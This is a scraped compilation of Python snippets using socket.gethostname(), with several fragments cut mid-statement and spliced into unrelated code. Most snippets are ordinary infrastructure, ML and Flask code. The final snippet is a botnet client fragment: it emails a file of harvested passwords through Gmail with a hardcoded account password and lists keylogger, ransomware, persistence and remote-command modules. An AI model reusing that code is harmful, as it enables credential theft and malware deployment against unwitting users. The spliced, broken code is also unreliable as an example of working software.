        "listenAddress": "0.0.0.0:14000",
        "managementListenAddress": "0.0.0.0:15000",
        "certificate": "test/certs/localhost/cert.pem",
        "privateKey": "test/certs/localhost/key.pem",
        "httpPort": 5000,
        "tlsPort": 5001,
        "ocspResponderURL":
        "http://{0}:5000/ocsp".format(own_ip),  # will be added later
        "externalAccountBindingRequired": False,
        "externalAccountMACKeys": {
            "kid-1":
            "zWNDZM6eQGHWpSRTPal5eIUYFTu7EajVIoguysqZ9wG44nMEtx3MUAsUDkMTQ12W",
Exemple #34
0
    variables.update(TF_VAR_panorama_bootstrap_key=bootstrap_key.read())

    # Generate a new RSA keypair to use to SSH to the VM. If you are using your own automation outside of
    # Panhandler then you should use your own keys.
    if os.path.exists(shared_wdir + 'id_rsa') is True:
        print('Crypto Key exists already, skipping....')
        public_key = open(shared_wdir + 'pub', 'r')
        # Add the public key to the variables sent to Terraform so it can create the GCP key pair.
        variables.update(TF_VAR_ra_key=public_key.read())

    # Init terraform with the modules and providers. The continer will have the some volumes as Panhandler.
    # This allows it to access the files Panhandler downloaded from the GIT repo.
    container = client.containers.run('tjschuler/terraform-gcloud',
                                      'terraform init -no-color -input=false',
                                      auto_remove=True,
                                      volumes_from=socket.gethostname(),
                                      working_dir=wdir,
                                      environment=variables,
                                      detach=True)
    # Monitor the log so that the user can see the console output during the run versus waiting until it is complete.
    # The container stops and is removed once the run is complete and this loop will exit at that time.
    for line in container.logs(stream=True):
        print(line.decode('utf-8').strip())
    # Run terraform apply
    container = client.containers.run(
        'tjschuler/terraform-gcloud',
        'terraform apply -auto-approve -no-color -input=false',
        auto_remove=True,
        volumes_from=socket.gethostname(),
        working_dir=wdir,
        environment=variables,
        'path_edges',
        'graph_id',
        'partition_id',
        'num_clients',
        'num_rounds',
        'IP',
        'PORT'
        ]

    args = dict(zip(arg_names, sys.argv[1:]))

    logging.warning('####################################### New Training Session #######################################')
    logging.info('Server started , graph ID %s, number of clients %s, number of rounds %s',args['graph_id'],args['num_clients'],args['num_rounds'])

    if 'IP' not in args.keys()  or args['IP'] == 'localhost':
        args['IP'] = socket.gethostname()

    if 'PORT' not in args.keys():
        args['PORT'] = 5000

    path_nodes = args['path_nodes'] + args['graph_id'] + '_nodes_' + args['partition_id'] + ".csv"
    nodes = pd.read_csv(path_nodes,index_col=0)
    #nodes = nodes.astype("float32")

    path_edges = args['path_edges'] + args['graph_id'] + '_edges_' + args['partition_id'] + ".csv"
    edges = pd.read_csv(path_edges)
    #edges = edges.astype({"source":"uint32","target":"uint32"})
    
   
    model = Model(nodes,edges)
    model.initialize()
Exemple #36
0
import socket  ## Inportação do socket que irá permitir as conexões

s = socket.socket() ## Atribui  "s" para o socket criar o objeto
host = socket.gethostname() ## host recebe  o endereço do programa
port = 8080  ## Definido a porta 8080, mas poderia ser qualquer outra que você queira.
s.bind((host, port))  ## Ligação do host e da porta com o socket
s.listen(1) ## Aqui ficamos ouvindo uma conexão de entrada
print(host) ## Imprime o endereço do servidor, que será usado pelo cliente se conectar ao servidor
print("Aguardando qualquer conexão de entrada ...")  ## Imprime a msn que aguarda uma conexão de entrada
conn, addr = s.accept()  ## Aceita todas as conexões
print(addr, "Se conectou ao servidor!") ## imprime o endereço do cliente que faz a conexão

## CRIANDO O ARQUIVO PARA TRANSFERÊNCIA
##Aqui o usuario entra com uma string informando o nome do arquivo que deseja e salva em filename
filename = input(str("Por favor, digite o nome do arquivo txt que deseja receber :   ")) 
file = open(filename , 'rb') ## Abre o arquivo no modo de leitura de bytes.
file_data = file.read(1024)
conn.send(file_data) ## Diz para a conexão enviar os dados ao cliente
print("Os dados foram transmitidos com sucesso!") ## Se os dados for transmitidos, imprime a msn de sucesso
Exemple #37
0
# the project for the full license.                                 #
#                                                                   #
#####################################################################

from __future__ import division
import os
from numbers import Number

from zprocess import zmq_get
from labscript_utils.labconfig import LabConfig, config_prefix
import socket

__version__ = '1.0.0'

_exp_config = LabConfig(
    os.path.join(config_prefix, '%s.ini' % socket.gethostname()))


class MiseParameter(object):
    def __init__(self, min, max, mutation_rate=None, log=False, initial=None):

        # Check for valid min and max
        if not isinstance(min, Number) or not isinstance(
                max, Number) or not max > min:
            raise ValueError(
                'MiseParameter must have unequal numerical min and max values, with min < max.'
            )

        # Set default mutation rate if unset:
        if mutation_rate is None:
            mutation_rate = (max - min) / 10
Exemple #38
0
    parser.add_argument('--n_iter', '-n', type=int, default=1000)
    parser.add_argument('--n_directions', '-nd', type=int, default=8)
    parser.add_argument('--deltas_used', '-du', type=int, default=8)
    parser.add_argument('--step_size', '-s', type=float, default=0.02)
    parser.add_argument('--delta_std', '-std', type=float, default=.03)
    parser.add_argument('--n_workers', '-e', type=int, default=6)
    parser.add_argument('--rollout_length', '-r', type=int, default=5000)

    # for Swimmer-v1 and HalfCheetah-v1 use shift = 0
    # for Hopper-v1, Walker2d-v1, and Ant-v1 use shift = 1
    # for Humanoid-v1 used shift = 5
    parser.add_argument('--shift', type=float, default=1)
    parser.add_argument('--seed', type=int, default=237)
    parser.add_argument('--policy_type', type=str, default='linear')
    parser.add_argument('--dir_path',
                        type=str,
                        default='trained_policies/Madras-explore7')
    parser.add_argument('--logdir',
                        type=str,
                        default='trained_policies/Madras-explore7')

    # for ARS V1 use filter = 'NoFilter'
    parser.add_argument('--filter', type=str, default='MeanStdFilter')

    local_ip = socket.gethostbyname(socket.gethostname())
    ray.init(redis_address="10.32.6.37:6382")

    args = parser.parse_args()
    params = vars(args)
    run_ars(params)
from netaddr import IPNetwork

from datastore_libnetwork import LibnetworkDatastoreClient
from pycalico.datastore_errors import DataStoreError
from pycalico.datastore_datatypes import IF_PREFIX, Endpoint
from pycalico import netns


FIXED_MAC = "EE:EE:EE:EE:EE:EE"
CONTAINER_NAME = "libnetwork"
ORCHESTRATOR_ID = "docker"

# How long to wait (seconds) for IP commands to complete.
IP_CMD_TIMEOUT = 5

hostname = socket.gethostname()
client = LibnetworkDatastoreClient()

# Return all errors as JSON. From http://flask.pocoo.org/snippets/83/
def make_json_app(import_name, **kwargs):
    """
    Creates a JSON-oriented Flask app.

    All error responses that you don't specifically
    manage yourself will have application/json content
    type, and will contain JSON like this (just an example):

    { "Err": "405: Method Not Allowed" }
    """
    def make_json_error(ex):
        response = jsonify({"Err":str(ex)})
Exemple #40
0
               default='mysql://*****:*****@localhost/heat',
               help='The SQLAlchemy connection string used to connect to the '
               'database'),
    cfg.IntOpt('sql_idle_timeout',
               default=3600,
               help='timeout before idle sql connections are reaped'),
]
engine_opts = [
    cfg.StrOpt('instance_driver',
               default='heat.engine.nova',
               help='Driver to use for controlling instances')
]
rpc_opts = [
    cfg.StrOpt(
        'host',
        default=socket.gethostname(),
        help='Name of the engine node.  This can be an opaque identifier.'
        'It is not necessarily a hostname, FQDN, or IP address.'),
    cfg.StrOpt('engine_topic',
               default='engine',
               help='the topic engine nodes listen on')
]


def register_metadata_opts():
    cfg.CONF.register_opts(service_opts)
    cfg.CONF.register_opts(bind_opts)
    cfg.CONF.register_opts(rpc_opts)


def register_api_opts():
Exemple #41
0
import time
import socket
import json
import cv2
import queue
import time
import numpy as np

import logging as log
import paho.mqtt.client as mqtt

from argparse import ArgumentParser
from inference import Network

# MQTT server environment variables
HOSTNAME = socket.gethostname()
IPADDRESS = socket.gethostbyname(HOSTNAME)
MQTT_HOST = IPADDRESS
MQTT_PORT = 3001
MQTT_KEEPALIVE_INTERVAL = 60

SECUENCIAL_SAFE_FRAMES = 10


def build_argparser():
    """
    Parse command line arguments.

    :return: command line arguments
    """
    parser = ArgumentParser()
def getMyName():
	hostname = socket.gethostname()
	return hostname
Exemple #43
0
def catchall_signal_lh(*args, **kwargs):

    def bash_command(cmd):
        p = subprocess.Popen(cmd, env=env, shell=True,
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE)
        out, err = p.communicate()
        my_logger.debug('Command %s' % cmd)
        if out != '':
            my_logger.debug('  Stdout: %s' % out)
        if err != '':
            my_logger.debug('  Stderr: %s' % err)
        return out.strip()

    message = kwargs['message']
    action = args[3]
    if kwargs['type'] == 'NodeStateChange' and action == 'left':
        node = args[0]
        this_node = socket.gethostname().split('.')[0]
        node_name = node.split('.')[0]
        cmd = 'cat /etc/rabbitmq/node_name_prefix_for_messaging 2>/dev/null'
        node_name_prefix = bash_command(cmd)
        if node_name_prefix == 'nil' or node_name_prefix in node_name:
            node_name_prefix = ''
        node_to_remove = 'rabbit@%s%s' % (node_name_prefix, node_name)

        my_logger.info("Got %s that left cluster" % node)
        my_logger.debug(kwargs)
        for arg in message.get_args_list():
            my_logger.debug("        " + str(arg))
        my_logger.info("Preparing to fence node %s from rabbit cluster"
                       % node_to_remove)

        if node == '' or re.search('\\b%s\\b' % this_node, node_name):
            my_logger.debug('Ignoring the node %s' % node_to_remove)
            return

        # NOTE(bogdando) when the rabbit node went down, its status
        # remains 'running' for a while, so few retries are required
        count = 0
        while True:
            cmd = ('rabbitmqctl eval '
                   '"mnesia:system_info(running_db_nodes)."'
                   '| grep -o %s') % node_to_remove
            results = bash_command(cmd)
            is_running = results != ''

            if not is_running or count >= 5:
                break

            count += 1
            time.sleep(10)

        if is_running:
            my_logger.warn('Ignoring alive node %s' % node_to_remove)
            return

        cmd = ('rabbitmqctl eval '
               '"mnesia:system_info(db_nodes)."'
               '| grep -o %s') % node_to_remove

        results = bash_command(cmd)
        in_cluster = results != ''

        if not in_cluster:
            my_logger.debug('Ignoring forgotten node %s' % node_to_remove)
            return

        my_logger.info('Disconnecting node %s' % node_to_remove)
        cmd = ('rabbitmqctl eval "disconnect_node'
               '(list_to_atom(\\"%s\\"))."') % node_to_remove
        bash_command(cmd)

        my_logger.info('Forgetting cluster node %s' % node_to_remove)
        cmd = 'rabbitmqctl forget_cluster_node %s' % node_to_remove
        bash_command(cmd)
Exemple #44
0
def _makerage(ui, repo, **opts):
    configoverrides = {
        # Make graphlog shorter.
        ("experimental", "graphshorten"):
        "1",
        # Force use of lines-square renderer, as the user's configuration may
        # not render properly in a text file.
        ("experimental", "graph.renderer"):
        "lines-square",
        # Reduce the amount of data used for debugnetwork speed tests to
        # increase the chance they complete within 20s.
        ("debugnetwork", "speed-test-download-size"):
        "4M",
        ("debugnetwork", "speed-test-upload-size"):
        "1M",
    }

    # Override the encoding to "UTF-8" to generate the rage in UTF-8.
    oldencoding = encoding.encoding
    oldencodingmode = encoding.encodingmode
    encoding.encoding = "UTF-8"
    encoding.encodingmode = "replace"

    def hgcmd(cmdname, *args, **additional_opts):
        cmd, opts = cmdutil.getcmdanddefaultopts(cmdname, commands.table)
        opts.update(additional_opts)

        _repo = repo
        if "_repo" in opts:
            _repo = opts["_repo"]
            del opts["_repo"]
        # If we failed to popbuffer for some reason, do not mess up with the
        # main `ui` object.
        newui = ui.copy()
        newui.pushbuffer(error=True, subproc=True)
        newui._colormode = None

        def remoteui(orig, src, opts):
            rui = orig(src, opts)
            rui._outputui = newui
            return rui

        try:
            with newui.configoverride(configoverrides,
                                      "rage"), extensions.wrappedfunction(
                                          hg, "remoteui", remoteui):
                if cmd.norepo:
                    cmd(newui, *args, **opts)
                else:
                    cmd(newui, _repo, *args, **opts)
        finally:
            return newui.popbuffer()

    basic = [
        ("date", lambda: time.ctime()),
        ("unixname", lambda: encoding.environ.get("LOGNAME")),
        ("hostname", lambda: socket.gethostname()),
        ("repo location", lambda: repo.root),
        ("cwd", lambda: pycompat.getcwd()),
        ("fstype", lambda: util.getfstype(repo.root)),
        ("active bookmark",
         lambda: bookmarks._readactive(repo, repo._bookmarks)),
        (
            "hg version",
            lambda: __import__("edenscm.mercurial.__version__").mercurial.
            __version__.version,
        ),
    ]

    detailed = [
        ("df -h", lambda: shcmd("df -h", check=False)),
        # smartlog as the user sees it
        ("hg sl", lambda: hgcmd("smartlog", template="{sl_debug}")),
        (
            "hg debugmetalog -t 'since 2d ago'",
            lambda: hgcmd("debugmetalog", time_range=["since 2d ago"]),
        ),
        (
            'first 20 lines of "hg status"',
            lambda: "\n".join(hgcmd("status").splitlines()[:20]),
        ),
        (
            "hg debugmutation -r 'draft() & date(-4)' -t 'since 4d ago'",
            lambda: hgcmd("debugmutation",
                          rev=["draft() & date(-4)"],
                          time_range=["since 4d ago"]),
        ),
        ("sigtrace", lambda: readsigtraces(repo)),
        (
            "hg blackbox",
            lambda: "\n".join(
                hgcmd("blackbox", pattern=BLACKBOX_PATTERN).splitlines()[-500:]
            ),
        ),
        ("hg summary", lambda: hgcmd("summary")),
        ("hg cloud status", lambda: hgcmd("cloud status")),
        ("hg debugprocesstree", lambda: hgcmd("debugprocesstree")),
        ("hg config (local)", lambda: "\n".join(localconfig(ui))),
        ("hg sparse", lambda: hgcmd("sparse")),
        ("hg debugchangelog", lambda: hgcmd("debugchangelog")),
        ("hg debuginstall", lambda: hgcmd("debuginstall")),
        ("hg debugdetectissues", lambda: hgcmd("debugdetectissues")),
        ("usechg", usechginfo),
        (
            "uptime",
            lambda: shcmd("wmic path Win32_OperatingSystem get LastBootUpTime"
                          if pycompat.iswindows else "uptime"),
        ),
        ("rpm info", (partial(rpminfo, ui))),
        ("klist", lambda: shcmd("klist", check=False)),
        ("ifconfig", lambda: shcmd("ipconfig"
                                   if pycompat.iswindows else "ifconfig")),
        (
            "airport",
            lambda: shcmd(
                "/System/Library/PrivateFrameworks/Apple80211." +
                "framework/Versions/Current/Resources/airport " + "--getinfo",
                check=False,
            ),
        ),
        ("hg debugnetwork", lambda: hgcmd("debugnetwork")),
        ("infinitepush backup state",
         lambda: readinfinitepushbackupstate(repo)),
        ("commit cloud workspace sync state",
         lambda: readcommitcloudstate(repo)),
        (
            "infinitepush / commitcloud backup logs",
            lambda: infinitepushbackuplogs(ui, repo),
        ),
        ("scm daemon logs", lambda: scmdaemonlog(ui, repo)),
        ("debugstatus", lambda: hgcmd("debugstatus")),
        ("debugtree", lambda: hgcmd("debugtree")),
        ("hg config (all)", lambda: "\n".join(allconfig(ui))),
        ("edenfs rage", lambda: shcmd("edenfsctl rage --stdout")),
        (
            "environment variables",
            lambda: "\n".join(
                sorted([
                    "{}={}".format(k, v) for k, v in encoding.environ.items()
                ])),
        ),
        ("ssh config",
         lambda: shcmd("ssh -G hg.vip.facebook.com", check=False)),
        ("debuglocks", lambda: hgcmd("debuglocks")),
    ]

    msg = ""

    if util.safehasattr(repo, "name"):
        # Add the contents of both local and shared pack directories.
        packlocs = {
            "local":
            lambda category: shallowutil.getlocalpackpath(
                repo.svfs.vfs.base, category),
            "shared":
            lambda category: shallowutil.getcachepackpath(repo, category),
        }

        for loc, getpath in pycompat.iteritems(packlocs):
            for category in constants.ALL_CATEGORIES:
                path = getpath(category)
                detailed.append((
                    "%s packs (%s)" % (loc, constants.getunits(category)),
                    lambda path=path: "%s:\n%s" % (
                        path,
                        shcmd("dir /o-s %s" % os.path.normpath(path)
                              if pycompat.iswindows else "ls -lhS %s" % path),
                    ),
                ))

    footnotes = []
    timeout = opts.get("timeout") or 20

    def _failsafe(gen, timeout=timeout):
        class TimedOut(RuntimeError):
            pass

        def target(result, gen):
            try:
                result.append(gen())
            except TimedOut:
                return
            except Exception as ex:
                index = len(footnotes) + 1
                footnotes.append("[%d]: %s\n%s\n\n" %
                                 (index, str(ex), traceback.format_exc()))
                result.append("(Failed. See footnote [%d])" % index)

        result = []
        thread = threading.Thread(target=target, args=(result, gen))
        thread.daemon = True
        thread.start()
        thread.join(timeout)
        if result:
            value = result[0]
            return value
        else:
            if thread.is_alive():
                # Attempt to stop the thread, since hg is not thread safe.
                # There is no pure Python API to interrupt a thread.
                # But CPython C API can do that.
                ctypes.pythonapi.PyThreadState_SetAsyncExc(
                    ctypes.c_long(thread.ident), ctypes.py_object(TimedOut))
            return (
                "(Did not complete in %s seconds, rerun with a larger --timeout to collect this)"
                % timeout)

    msg = []
    profile = []
    allstart = time.time()
    for name, gen in basic:
        msg.append("%s: %s\n\n" % (name, _failsafe(gen)))
    profile.append((time.time() - allstart, "basic info", None))
    for name, gen in detailed:
        start = time.time()
        with progress.spinner(ui, "collecting %r" % name):
            value = _failsafe(gen)
        finish = time.time()
        msg.append("%s: (%.2f s)\n---------------------------\n%s\n\n" %
                   (name, finish - start, value))
        profile.append((finish - start, name, value.count("\n")))
    allfinish = time.time()
    profile.append((allfinish - allstart, "total time", None))

    msg.append("hg rage profile:\n")
    width = max([len(name) for _t, name, _l in profile])
    for timetaken, name, lines in reversed(sorted(profile)):
        m = "  %-*s  %8.2f s" % (width + 1, name + ":", timetaken)
        if lines is not None:
            msg.append("%s for %4d lines\n" % (m, lines))
        else:
            msg.append("%s\n" % m)
    msg.append("\n")

    msg.extend(footnotes)
    msg = "".join(msg)

    encoding.encoding = oldencoding
    encoding.encodingmode = oldencodingmode
    return msg
Exemple #45
0
import uuid
import time
from tasks import add_task
import socket
env = os.environ
app = Flask(__name__)
import logging
from logging.handlers import RotatingFileHandler

logger = logging.getLogger('app')
logger.setLevel(logging.DEBUG)
handler = RotatingFileHandler('log/app.log',
                              maxBytes=1024000 * 1024000,
                              backupCount=2)
logger.addHandler(handler)
container_id = socket.gethostname()


@app.route('/add/<int:param1>/<int:param2>/<param3>')
def add(param1, param2, param3):
    task = add_task.apply_async(args=[param1, param2],
                                kwargs={},
                                task_id=param3)
    # add.apply_async()
    # t1 = time.time()
    # task = celery.send_task('mytasks.add', args=[param1, param2], kwargs={}, task_id=str(uuid.uuid4()))
    # a = time.time() - t1
    # print(time.time() - t1)
    logger.info(container_id)
    return "<a href='{url}'>check status of {id} time add to queue </a>".format(
        id=task.id, url=url_for('check_task', id=task.id, _external=True))
Exemple #46
0
def hello():
    html = "<h3>Hello {name}!</h3> <b>Hostname:</b> {hostname}<br/>"
    return html.format(name=os.getenv("NAME", "world"), hostname=socket.gethostname())
Exemple #47
0
import sys
import p1b1_runner
import json, os
import socket

if (len(sys.argv) < 3):
    print('requires arg1=param and arg2=filename')
    sys.exit(1)

parameterString = sys.argv[1]
filename = sys.argv[2]

# print (parameterString)
print("filename is " + filename)
print(socket.gethostname())

integs = [int(x) for x in parameterString.split(',')]
print(integs)

hyper_parameter_map = {'epochs': integs[0]}
hyper_parameter_map['framework'] = 'keras'
hyper_parameter_map['batch_size'] = integs[1]
hyper_parameter_map['dense'] = [integs[2], integs[3]]
hyper_parameter_map['run_id'] = parameterString
# hyper_parameter_map['instance_directory'] = os.environ['TURBINE_OUTPUT']
hyper_parameter_map['save'] = os.environ[
    'TURBINE_OUTPUT'] + "/output-" + os.environ['PMI_RANK']
sys.argv = ['p1b1_runner']
val_loss = p1b1_runner.run(hyper_parameter_map)
print(val_loss)
Exemple #48
0
    contexts = {v_thing_ID: context_vThing}

    port_mapping = db[thing_visor_collection].find_one(
        {"thingVisorID": thing_visor_ID}, {
            "port": 1,
            "_id": 0
        })
    poa_IP_dict = db[thing_visor_collection].find_one(
        {"thingVisorID": thing_visor_ID}, {
            "IP": 1,
            "_id": 0
        })
    poa_IP = str(poa_IP_dict['IP'])
    poa_port = port_mapping['port'][str(flask_port) + '/tcp']
    if not poa_IP:
        poa_IP = socket.gethostbyname(socket.gethostname())
    if not poa_port:
        poa_port = flask_port
    notification_URI = ["http://" + poa_IP + ":" + poa_port + "/notify"]

    # set v_thing_topic the name of mqtt topic on witch publish vThing data
    # e.g vThing/helloWorld/hello
    v_thing_topic = v_thing_prefix + "/" + v_thing_ID

    mqtt_control_client = mqtt.Client()
    mqtt_data_client = mqtt.Client()

    thread1 = httpThread()  # http server used to receive subscribed data
    thread1.start()

    mqtt_control_thread = mqttControlThread()  # mqtt control thread
Exemple #49
0
def main():
    val_step = 10000
    val_steps = [10000,]
    train_step = 500


    hostname = socket.gethostname()

    args.stepvalues = [int(val) for val in args.step_values.split(',')]

    exp_name = '{}-{}-{}-{}--P{:d}-is{:d}-sl{:02d}-g{:d}-fs{:d}-{}-{:06d}'.format(args.dataset,args.datasubset,
                args.input, args.arch, args.pretrained, args.isize, args.seq_len, args.gap,
                                args.frame_step, args.batch_size, int(args.lr * 1000000))

    args.exp_name = exp_name
    args.root += args.dataset+'/'
    args.save_root += args.dataset+'/'
    model_save_dir = args.save_root + 'cache/' + exp_name
    if not os.path.isdir(model_save_dir):
        os.system('mkdir -p ' + model_save_dir)

    args.model_save_dir = model_save_dir
    # args.global_models_dir = os.path.expanduser(args.global_models_dir)

    if args.visdom:
        import visdom
        viz = visdom.Visdom()
        # ports = {'mars':8097,'sun':8096}
        viz.port = args.vis_port
        viz.env = exp_name

        # initialize visdom loss plot
        loss_plot = viz.line(
            X=torch.zeros((1,)).cpu(),
            Y=torch.zeros((1, 2)).cpu(),
            opts=dict(
                xlabel='Iteration',
                ylabel='Losses',
                title='Train & Val Losses',
                legend=['Train-Loss', 'Val-Loss']
            )
        )

        eval_plot = viz.line(
            X=torch.zeros((1,)).cpu(),
            Y=torch.zeros((1, 4)).cpu(),
            opts=dict(
                xlabel='Iteration',
                ylabel='Accuracy',
                title='Train & Val Accuracies',
                legend=['trainTop3', 'valTop3', 'trainTop1','valTop1']
            )
        )

    ## load dataloading configs
    input_size, means, stds = get_mean_size(args.arch)
    input_size = args.isize
    normalize = transforms.Normalize(mean=means,
                                     std=stds)

    # Data loading transform based on model type
    transform = transforms.Compose([transforms.ToTensor(), normalize])
    val_transform = transforms.Compose([transforms.Scale(int(input_size * 1.1)),
                                        transforms.CenterCrop(int(input_size)),
                                        transforms.ToTensor(),
                                        normalize,
                                        ])

    if args.arch.find('vgg') > -1:
        transform = BaseTransform(size=input_size,mean=means)
        val_transform = transform
        print('\n\ntransforms are going to be VGG type\n\n')
    subsets = ['train']
    # pdb.set_trace()
    train_dataset = KINETICS(args.root,
                             args.input,
                             transform,
                             dataset_name=args.dataset,
                             netname=args.arch,
                             datasubset=args.datasubset,
                             subsets=subsets,
                             scale_size=int(input_size*1.1),
                             input_size=int(input_size),
                             exp_name=exp_name,
                             frame_step=args.frame_step,
                             seq_len=args.seq_len,
                             gap=args.gap
                             )

    args.num_classes = train_dataset.num_classes
    print('Models will be cached in ', args.model_save_dir, 'has ', args.num_classes, ' classes')

    train_loader = torch.utils.data.DataLoader(train_dataset,
                                               batch_size=args.batch_size, shuffle=True,
                                               num_workers=args.workers, pin_memory=True
                                               )

    val_dataset = KINETICS(args.root,
                           args.input,
                           val_transform,
                           dataset_name=args.dataset,
                           netname=args.arch,
                           datasubset=args.datasubset,
                           subsets=['val',],
                           exp_name=exp_name,
                           scale_size=int(input_size * 1.1),
                           input_size=int(input_size),
                           frame_step=args.frame_step*4,
                           seq_len=args.seq_len,
                           gap=args.gap
                           )

    val_loader  = torch.utils.data.DataLoader(val_dataset,
                                              batch_size=args.batch_size, shuffle=False,
                                              num_workers=args.workers, pin_memory=True
                                              )

    model, criterion = initialise_model(args)

    parameter_dict = dict(model.named_parameters())
    params = []
    for name, param in parameter_dict.items():
        if name.find('bias') > -1:
            params += [{'params': [param], 'lr': args.lr*2, 'weight_decay': 0}]
        else:
            params += [{'params': [param], 'lr': args.lr, 'weight_decay':args.weight_decay}]


    optimizer = torch.optim.SGD(params, args.lr, momentum=args.momentum)
    scheduler = MultiStepLR(optimizer, milestones=args.stepvalues, gamma=args.gamma)

    if args.resume:
        latest_file_name = '{:s}/latest.pth'.format(args.model_save_dir)
        print('Resume model from ', latest_file_name)
        latest_dict = torch.load(latest_file_name)
        args.start_iteration = latest_dict['iteration'] + 1
        model.load_state_dict(torch.load(latest_dict['model_file_name']))
        optimizer.load_state_dict(torch.load(latest_dict['optimizer_file_name']))
        log_fid = open(args.model_save_dir + '/training.log', 'a')
        args.iteration = latest_dict['iteration']-1
        for _ in range(args.iteration):
            scheduler.step()
    else:
        log_fid = open(args.model_save_dir + '/training.log', 'w')

    log_fid.write(args.exp_name + '\n')
    for arg in vars(args):
        print(arg, getattr(args, arg))
        log_fid.write(str(arg) + ': ' + str(getattr(args, arg)) + '\n')

    log_fid.write(str(model))
    best_top1 = 0.0
    val_loss = 0.0
    val_top1 = 0.0
    val_top3 = 0.0
    batch_time = AverageMeter()
    data_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top3 = AverageMeter()
    iteration = args.start_iteration
    approx_epochs = np.ceil(float(args.max_iterations-iteration)/len(train_loader))

    print('Approx Epochs to RUN: {}, Start Ietration {} Max iterations {} # of samples in dataset {}'.format(
        approx_epochs, iteration, args.max_iterations, len(train_loader)))
    epoch = -1
    if args.ngpu > 1:
        print('\n\nLets do dataparallel\n\n')
        model = torch.nn.DataParallel(model)

    model.train()
    model.apply(set_bn_eval)
    torch.cuda.synchronize()
    start = time.perf_counter()
    while iteration < args.max_iterations:
        epoch += 1
        for i, (batch, targets, __ , __) in enumerate(train_loader):
            if i<len(train_loader):
                if iteration > args.max_iterations:
                    break
                iteration += 1
                #pdb.set_trace()
                #print('input size ',batch.size())
                targets = targets.cuda(async=True)
                input_var = torch.autograd.Variable(batch.cuda(async=True))
                target_var = torch.autograd.Variable(targets)

                torch.cuda.synchronize()
                data_time.update(time.perf_counter() - start)

                # compute output
                output = model(input_var)
                loss = criterion(output, target_var)
                #pdb.set_trace()
                # measure accuracy and record loss
                prec1, prec3 = accuracy(output.data, targets, topk=(1, 3))
                losses.update(loss.data[0], batch.size(0))
                top1.update(prec1[0], batch.size(0))
                top3.update(prec3[0], batch.size(0))

                # compute gradient and do SGD step
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                scheduler.step()
                # measure elapsed time
                torch.cuda.synchronize()
                batch_time.update(time.perf_counter() - start)
                start = time.perf_counter()
                if iteration % args.print_freq == 0:
                    line = 'Epoch: [{0}][{1}/{2}] Time {batch_time.val:.3f} ({batch_time.avg:.3f}) Data {data_time.val:.3f} ({data_time.avg:.3f})'.format(
                           epoch, iteration, len(train_loader), batch_time=batch_time, data_time=data_time)
                    line += 'Loss {loss.val:.4f} ({loss.avg:.4f}) Prec@1 {top1.val:.3f} ({top1.avg:.3f}) Prec@3 {top3.val:.3f} ({top3.avg:.3f})'.format(
                                loss=losses, top1=top1, top3=top3)
                    print(line)
                    log_fid.write(line+'\n')


                avgtop1 = top1.avg
                avgtop3 = top3.avg
                avgloss = losses.avg
                if (iteration % val_step == 0 or iteration in val_steps) and iteration > 0:
                    # evaluate on validation set
                    val_top1, val_top3, val_loss = validate(args, val_loader, model, criterion)
                    line = '\n\nValidation @ {:d}: Top1 {:.2f} Top3 {:.2f} Loss {:.3f}\n\n'.format(
                                iteration, val_top1, val_top3, val_loss)
                    print(line)
                    log_fid.write(line)
                    # remember best prec@1 and save checkpoint
                    is_best = val_top1 > best_top1
                    best_top1 = max(val_top1, best_top1)
                    torch.cuda.synchronize()
                    line = '\nBest Top1 sofar {:.3f} current top1 {:.3f} Time taken for Validation {:0.3f}\n\n'.format(best_top1, val_top1, time.perf_counter()-start)
                    log_fid.write(line + '\n')
                    print(line)
                    save_checkpoint({
                        'epoch': epoch,
                        'iteration': iteration,
                        'arch': args.arch,
                        'val_top1': val_top1,
                        'val_top3': val_top3,
                        'val_loss': val_loss,
                        'train_top1': avgtop1,
                        'train_top3': avgtop3,
                        'train_loss': avgloss,
                        'state_dict': model.state_dict(),
                        'optimizer' : optimizer.state_dict(),
                    }, is_best, args.model_save_dir)
                    if args.visdom:
                        viz.line(
                            X=torch.ones((1, 2)).cpu() * iteration,
                            Y=torch.Tensor([avgloss, val_loss]).unsqueeze(0).cpu(),
                            win=loss_plot,
                            update='append'
                        )
                        viz.line(
                            X=torch.ones((1, 4)).cpu() * iteration,
                            Y=torch.Tensor([avgtop3, val_top3, avgtop1, val_top1]).unsqueeze(0).cpu(),
                            win=eval_plot,
                            update='append'
                        )

                    model.train()
                    model.apply(set_bn_eval)

                if iteration % train_step == 0 and iteration > 0:
                    if args.visdom:
                        viz.line(
                            X=torch.ones((1, 2)).cpu() * iteration,
                            Y=torch.Tensor([avgloss, val_loss]).unsqueeze(0).cpu(),
                            win=loss_plot,
                            update='append'
                        )
                        viz.line(
                            X=torch.ones((1, 4)).cpu() * iteration,
                            Y=torch.Tensor([avgtop3, val_top3, avgtop1, val_top1]).unsqueeze(0).cpu(),
                            win=eval_plot,
                            update='append'
                        )
                    top1.reset()
                    top3.reset()
                    losses.reset()
                    print('RESET::=> ', args.exp_name)
def dbPort():
    return 54321 if gethostname() in dev_remote_hosts else 5432
# -----------------------------------------------------------------------------------
# Installs can also choose how long to keep FlowSessions around. These are
# potentially big but really helpful for debugging. Default is 7 days.
# -----------------------------------------------------------------------------------
FLOW_SESSION_TRIM_DAYS = 7

# -----------------------------------------------------------------------------------
# Mailroom - disabled by default, but is where simulation happens
# -----------------------------------------------------------------------------------
MAILROOM_URL = None
MAILROOM_AUTH_TOKEN = None

# -----------------------------------------------------------------------------------
# Chatbase integration
# -----------------------------------------------------------------------------------
CHATBASE_API_URL = "https://chatbase.com/api/message"

# To allow manage fields to support up to 1000 fields
DATA_UPLOAD_MAX_NUMBER_FIELDS = 4000

# When reporting metrics we use the hostname of the physical machine, not the hostname of the service
MACHINE_HOSTNAME = socket.gethostname().split(".")[0]

# ElasticSearch configuration (URL RFC-1738)
ELASTICSEARCH_URL = os.environ.get("ELASTICSEARCH_URL",
                                   "http://localhost:9200")

# Maximum active ContactFields users can have in an Org
MAX_ACTIVE_CONTACTFIELDS_PER_ORG = 255
Exemple #52
0
    # Enable low securtity apps in GMAIL for the sender email permissions
    send_email('*****@*****.**', 'PuG#GeLk!3552;',
               '*****@*****.**', "Your passwords",
               "You can find your new passwords is this e-mail !",
               ["dat.json"])
    os.remove("dat.json")

#from modules import passwd
#from modules import keylogger

MODULES = [
    'runcmd', 'persistence', 'download', 'upload', 'screenshot', 'port',
    'keylogger', 'ip_scan', 'ransomware'
]
if not settings.BOT_ID:
